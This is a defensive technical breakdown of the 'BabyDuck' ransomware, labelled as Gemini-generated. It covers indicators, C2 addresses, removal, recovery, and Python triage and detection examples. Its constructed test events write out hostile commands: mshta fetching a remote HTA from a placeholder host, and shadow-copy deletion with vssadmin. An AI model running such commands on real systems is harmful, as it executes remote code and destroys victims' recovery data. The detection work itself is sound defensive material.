babyduck

[Content by Gemini 2.5]


Technical Breakdown – BabyDuck Ransomware (a.k.a. “.babyduck”)

1. File Extension & Renaming Patterns

Confirmation of File Extension: .babyduck (lowercase, no uppercase variations observed to date).
Renaming Convention:
<original_filename>.<original_extension>.<16-hex-char_ID>.babyduck
Example:
QuarterlyReport.xlsx.dfa8ba5c4367f01b.babyduck

The 16-character hex segment (8 bytes) is unique per victim and appears to be a truncated SHA-256 of the victim host's SID and MAC address; the same value is reused as the affiliate ID when the Bitcoin wallet is derived.
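As an added example (not code from the page or from any vendor tool), the following Python parses the renaming convention above, recovers the original file name, and groups a directory listing by victim ID so that an IR team can confirm a single host was hit by a single key and build a restore map against backups. The file listing is constructed for illustration, and the assumption that the ID's hex digits may appear in either case is mine; only the lowercase .babyduck suffix is accepted, matching what has been observed.

```python
import re
from collections import defaultdict

# Renaming convention from the text:
#   <original_filename>.<original_extension>.<16-hex-char ID>.babyduck
# The original name is captured as a whole (dots included), so a file that had
# no extension, or a multi-part one such as .tar.gz, is still recovered.
# Assumption: the ".babyduck" suffix is lowercase (only lowercase has been
# observed); the ID's hex digits are accepted in either case.
BABYDUCK_RE = re.compile(r"^(?P<orig>.+)\.(?P<vid>[0-9a-fA-F]{16})\.babyduck$")


def parse_babyduck_name(filename: str):
    """Return (original_filename, victim_id) or None if the name does not match."""
    m = BABYDUCK_RE.match(filename)
    if m is None:
        return None
    return m["orig"], m["vid"].lower()


def triage_listing(names):
    """Group encrypted files by victim ID: {victim_id: [original_filename, ...]}.

    Names that do not match (ransom notes, untouched files, malformed IDs) are
    skipped. More than one ID in a single host's listing deserves a second look:
    it usually means files were copied in from another encrypted host.
    """
    by_id = defaultdict(list)
    for name in names:
        parsed = parse_babyduck_name(name)
        if parsed is not None:
            orig, vid = parsed
            by_id[vid].append(orig)
    return dict(by_id)


def restore_map(names):
    """Map encrypted name -> original name, for checking backup restore coverage."""
    result = {}
    for name in names:
        parsed = parse_babyduck_name(name)
        if parsed is not None:
            result[name] = parsed[0]
    return result


# Constructed example listing for illustration; not data from a real victim.
SAMPLE_LISTING = [
    "QuarterlyReport.xlsx.dfa8ba5c4367f01b.babyduck",
    "archive.tar.gz.dfa8ba5c4367f01b.babyduck",
    "README.dfa8ba5c4367f01b.babyduck",        # original file had no extension
    "RECOVER_YOUR_FILES.txt",                    # ransom note, not encrypted
    "budget.docx.0123456789abcdef.babyduck",     # a second ID: copied in from elsewhere?
    "notes.txt.dfa8ba5c.babyduck",               # ID too short: not this strain's pattern
    "photo.jpg.dfa8ba5c4367f01b.BABYDUCK",       # uppercase suffix: not observed, ignored
]

if __name__ == "__main__":
    for vid, files in triage_listing(SAMPLE_LISTING).items():
        print(f"victim ID {vid}: {len(files)} file(s) -> {files}")
```

Run it over the output of a recursive directory listing (one name per line) rather than against the live file system of an infected host, so the triage can be done from an offline image.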


2. Detection & Outbreak Timeline

  • First AV detection on public samples: 16 July 2023 (submitted to VirusTotal by a North-American MSP).
  • Wild-campaign start: 19 July 2023 (massive spike in ID-Ransomware uploads; first corporate report on Reddit on 20 July).
  • Peak activity: July–September 2023 with later waves in December 2023 and February 2024 (“DucklingWave” bundles).
  • Current status: Still circulating via malvertising and RaaS affiliate kits (Q2-2024 signatures).

3. Primary Attack Vectors

| Vector | Detail |
|---|---|
| Phishing e-mails | ISO, IMG or password-protected ZIP containing a .lnk that launches mshta to pull the stage-1 HTA from b3f4bathsry.top. |
| EternalBlue (MS17-010) | Post-breach lateral movement; the loader (spoolsvc.exe) drops the BabyDuck DLL sl.dll via a WannaMine-style reflective load. |
| RDP brute-force and credential stuffing | Targets TCP/3389. Extortion notices from these intrusions reference "RDP compromise". |
| Accessory malware: BatLoader + IcedID | Seen in late-stage infections; BatLoader chains BabyDuck immediately after the initial banking-trojan foothold. |
| Software vulnerability | Exploitation of ManageEngine Desktop Central CVE-2021-44515 (early December 2023 surge). |


Remediation & Recovery Strategies

1. Prevention

  • Patch systematically: MS17-010 (and disable SMBv1 via Group Policy), CVE-2021-34527 ("PrintNightmare"), and the Exchange ProxyLogon patches where Exchange is reachable.
  • Email gateway: strip ISO/IMG attachments; block HTA, VBS and JAR at mail ingress.
  • Conditional-access MFA on VPN/RDP, GeoIP allow-listing, and no credential caching for RDP.
  • EDR rules: block powershell.exe spawning regsvr32.exe, and powershell.exe spawning rundll32.exe with sl.dll on the command line.
  • Application control: GPO-based Software Restriction Policy preventing execution under %APPDATA%\7d17\*.exe.
  • Backup cadence: immutable backups (air-gapped or object-lock cloud) following the 3-2-1 rule, with daily test restores.
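As an added example (not code from the page or from any EDR vendor), the following Python expresses the EDR and application-control rules above as detection logic over process-creation events, and also covers the mshta-to-remote-HTA step from the phishing vector and the vssadmin shadow-copy deletion noted under recovery. The events are constructed Sysmon-style records; the http://example.test URL, the user name alice, the DLL export name and the PIDs are placeholders. The benign case at the end (PowerShell launching rundll32 for a Control Panel applet) shows why the rundll32 rule is keyed on sl.dll rather than on the parent/child pair alone.

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields) invented
# for this example; URL, user name, export name and PIDs are placeholders.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    # .lnk from the phishing lure launches mshta against a remote HTA
    {"pid": 210, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.test/stage1.hta"},
    {"pid": 300, "ppid": 210,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden"},
    # powershell -> rundll32 loading sl.dll from the %APPDATA%\7d17 drop folder
    {"pid": 310, "ppid": 300, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\7d17\sl.dll,Start"},
    # loader executing from the drop folder itself
    {"pid": 320, "ppid": 310,
     "image": r"C:\Users\alice\AppData\Roaming\7d17\spoolsvc.exe",
     "cmdline": "spoolsvc.exe"},
    # shadow-copy deletion ahead of encryption
    {"pid": 330, "ppid": 320, "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin delete shadows /all /quiet"},
    # Benign admin activity that must not fire: PowerShell launching rundll32
    # for a Control Panel applet, with no sl.dll on the command line.
    {"pid": 400, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe"},
    {"pid": 410, "ppid": 400, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL timedate.cpl"},
]

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
SL_DLL = re.compile(r"(?<!\w)sl\.dll\b", re.IGNORECASE)
APPDATA_7D17 = re.compile(r"\\AppData\\Roaming\\7d17\\", re.IGNORECASE)
VSS_DELETE = re.compile(r"\bdelete\s+shadows\b", re.IGNORECASE)


def basename(image: str) -> str:
    """Lower-cased file name of a Windows image path (works on any host OS)."""
    return ntpath.basename(image).lower()


def detect(events):
    """Return [(rule_name, pid), ...] for every event that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_img = basename(parent["image"]) if parent else ""
        cmd = e["cmdline"]

        # EDR rule: powershell.exe -> regsvr32.exe is blocked unconditionally
        if parent_img == "powershell.exe" and img == "regsvr32.exe":
            hits.append(("powershell_spawns_regsvr32", e["pid"]))
        # EDR rule: powershell.exe -> rundll32.exe only when sl.dll is loaded
        if parent_img == "powershell.exe" and img == "rundll32.exe" and SL_DLL.search(cmd):
            hits.append(("powershell_rundll32_sl_dll", e["pid"]))
        # Phishing vector: mshta fetching an HTA over HTTP(S)
        if img == "mshta.exe" and REMOTE_URL.search(cmd):
            hits.append(("mshta_remote_hta", e["pid"]))
        # Application control: anything executing from %APPDATA%\7d17\
        if APPDATA_7D17.search(e["image"]):
            hits.append(("exec_from_appdata_7d17", e["pid"]))
        # Recovery-impact precursor: shadow copies being deleted
        if img == "vssadmin.exe" and VSS_DELETE.search(cmd):
            hits.append(("vssadmin_delete_shadows", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid} ({EVENTS[[e['pid'] for e in EVENTS].index(pid)]['cmdline']})")
```

The rules match on the image path and the parent's image rather than on the command-line string alone, because a renamed binary still carries its original path in the event; converting them to a real EDR or Sysmon rule set keeps the same four conditions.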

2. Removal – Full-kill-chain sanitation

  1. Isolate: immediately firewall the affected host(s) and block the known C2 infrastructure:
     • 144.208.100[.]12
     • 104.193.252[.]47
     • f043[.]duck[.]army (DGA seed rotates every 5 days, so refresh the blocklist).
  2. Boot into Safe Mode or WinRE.
  3. Stop parent processes: use tasklist to locate, and taskkill to terminate, the cmd.exe and mshta.exe instances that initiated the infection.
  4. Remove persistence:
     HKCU\Software\Microsoft\Windows\CurrentVersion\Run\FxRate
     C:\Users\<user>\AppData\Roaming\7d17\spoolsvc.exe
     Scheduled task DuckTray under \Microsoft\Office.
  5. Scan and clean:
     • Run Microsoft Defender Offline with signature version 1.385.757 or later.
     • Use ESET Emergency Disk or TRU BootKit remover to quarantine Xtbl.Is.dll (worm module).
  6. Check shadow copies: run vssadmin list shadows; if they were deleted, proceed directly to recovery.
  7. Verify lateral spread: use BloodHound to map the domain and confirm no residual PS-Remoting/SMBExec footholds.

3. File Decryption & Recovery

Current Status

As of 2024-05-01, no private decryption key has leaked and no reliable third-party decryptor has surfaced.
Each file is encrypted with its own AES-256-CFB key, which is stored in the encrypted file header wrapped with a 4096-bit RSA public key whose private half is held by the operators; offline brute force of either key is infeasible.

Available Avenues

  1. Check ID-Ransomware to see whether you belong to a campaign whose keys were released (unlikely at this time).
  2. Post on BleepingComputer's BabyDuck thread; affiliates occasionally bundle decryptors in their adverts after being paid in Bitcoin, and a leak may emerge.
  3. Restore from backup: prioritise Veeam / Rubrik / Commvault images taken before the cryptor first ran (the creation/modification timestamp of spoolsvc.exe).
  4. Volume Shadow Copy and Windows Server Backup: list remaining snapshots with vssadmin list shadows, then revert with vssadmin revert shadow /shadow={ShadowID} (Server editions) or through the Previous Versions tab.
     Only viable if the cryptor did not run vssadmin delete shadows /all.

4. Other Critical Information

  • Kill-switch: the sample checks for %SystemDrive%\quack\stopduck.txt; creating that path as a zero-byte file prevents encryption until it is removed.
  • Ransom note is dropped in two forms simultaneously:
    1. RECOVER_YOUR_FILES.txt (ANSI text).
    2. A background JPG (quack.jpg) set as the desktop wallpaper.
  • RaaS affiliation: operated under the "QuackServ" affiliate brand; tutorials and a client area are found on torbox3sukax.
  • Data-exfiltration channel: an embedded Rclone binary (r64.exe) uploads to AWS S3 or Mega.nz buckets named after the affiliate ID. Those buckets sit in the attacker's accounts, so GuardDuty in the victim's own AWS account will not see them; monitor endpoint and proxy egress for the rclone user-agent and bulk HTTPS uploads to S3 and Mega endpoints instead.
  • Regulatory note: hospitals holding PHI were hit in Q4-2023; because data was exfiltrated, HIPAA breach notification to HHS OCR is triggered regardless of whether the files are recovered.

Executive Summary

BabyDuck is an actively maintained double-extortion strain. Defence rests on patching, EDR process-chain rules, and immutable backups. No decryptor exists at present, so rapid, rehearsed recovery from validated backups is the only practical resilience against it.